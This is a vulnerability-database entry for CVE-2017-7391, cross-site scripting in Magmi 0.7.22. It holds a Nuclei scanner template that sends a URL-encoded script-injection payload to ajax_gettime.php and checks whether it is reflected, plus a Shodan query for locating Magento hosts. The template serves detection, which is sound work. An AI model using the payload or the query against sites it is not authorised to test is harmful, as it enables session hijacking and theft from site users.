Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-7391
HistorySep 03, 2020 - 3:32 a.m.

Magmi 0.7.22 - Cross-Site Scripting

2020-09-0303:32:29
ProjectDiscovery
github.com
3

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.002

Percentile

57.2%

Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL.

id: CVE-2017-7391

info:
  name: Magmi 0.7.22 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Magmi or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - https://github.com/dweeves/magmi-git/issues/522
    - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
    - https://github.com/dweeves/magmi-git/pull/525
    - https://nvd.nist.gov/vuln/detail/CVE-2017-7391
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-7391
    cwe-id: CWE-79
    epss-score: 0.00195
    epss-percentile: 0.56964
    cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: magmi_project
    product: magmi
    shodan-query: http.component:"magento"
  tags: cve2017,cve,magmi,xss,magmi_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain);</script><'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022032f11d9b1504fb042b6c91f441deb1a249e941dcbde63ac51f350b05b9e83f71022100875a24db627da0c59bd4743d91b6cca4c08dae7b6fa17d24f1a216284fd2b0a9:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.002

Percentile

57.2%